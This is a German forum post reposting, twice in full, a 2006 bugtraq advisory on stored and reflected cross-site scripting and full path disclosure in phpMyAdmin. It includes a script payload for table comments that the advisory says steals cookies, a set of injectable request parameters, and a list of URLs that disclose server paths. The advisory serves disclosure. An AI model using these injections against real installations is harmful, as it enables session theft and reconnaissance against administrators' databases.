0
PhpMyAdmin hohes Sicherheitsrisiko durch XSS permanent and full path disclosure
vendor site:http://phpmyadmin.net/
product:PhpMyAdmin all version
bug: xss permanent & full path disclosure
global risk:high
xss post :
1) create a table , with whatever name , when it's done , go to "operation"
(/db_operations.php) and add a comment on your table with:
</textarea>'"><script>alert(document.cookie)</script>
( the "alert" is only to show the xss is working ...)
this is a serious security issue , because it's a permanent xss , when you get into phpmyadmin
you will get your cookie stealed directly , without looking at the attacker_table.
2)
/phpmyadmin/db_create.php
variables :
token=your_token&reload=1&db=[double xss(2 followed xss)]
3)
/phpmyadmin/db_operations.php
variables:
db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]
4)
/phpmyadmin/querywindow.php
token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]
querydisplay_tab
xss get :
http://site.com/phpmyadmin/sql.php?db=information_schema&token=your ...;
Note: if there's a "token=" on this string ,it's because you need it , so replace this one with yours .
full path disclosure :
/scripts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang=
/index.php?target=
/index.php?db=
/index.php?goto=
/left.php?server=
/index.php?table=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&tbl_group=
/db_printview.php?db="
/sql.php?back=
[Advisory by laurent gaffié & benjamin mossé, http://s-a-p.ca/, vom 16. November 2006, 10:23 AM, bugtraq]
saludos
gnarff
product:PhpMyAdmin all version
bug: xss permanent & full path disclosure
global risk:high
xss post :
1) create a table , with whatever name , when it's done , go to "operation"
(/db_operations.php) and add a comment on your table with:
</textarea>'"><script>alert(document.cookie)</script>
( the "alert" is only to show the xss is working ...)
this is a serious security issue , because it's a permanent xss , when you get into phpmyadmin
you will get your cookie stealed directly , without looking at the attacker_table.
2)
/phpmyadmin/db_create.php
variables :
token=your_token&reload=1&db=[double xss(2 followed xss)]
3)
/phpmyadmin/db_operations.php
variables:
db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]
4)
/phpmyadmin/querywindow.php
token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]
querydisplay_tab
xss get :
http://site.com/phpmyadmin/sql.php?db=information_schema&token=your ...;
Note: if there's a "token=" on this string ,it's because you need it , so replace this one with yours .
full path disclosure :
/scripts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang=
/index.php?target=
/index.php?db=
/index.php?goto=
/left.php?server=
/index.php?table=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&tbl_group=
/db_printview.php?db="
/sql.php?back=
[Advisory by laurent gaffié & benjamin mossé, http://s-a-p.ca/, vom 16. November 2006, 10:23 AM, bugtraq]
saludos
gnarff
Auf Facebook teilen
Auf Twitter teilen
Auf Reddit teilen
Auf Linkedin teilenBitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 44651
Url: https://administrator.de/forum/phpmyadmin-hohes-sicherheitsrisiko-durch-xss-permanent-and-full-path-disclosure-44651.html
Ausgedruckt am: 15.01.2025 um 08:01 Uhr
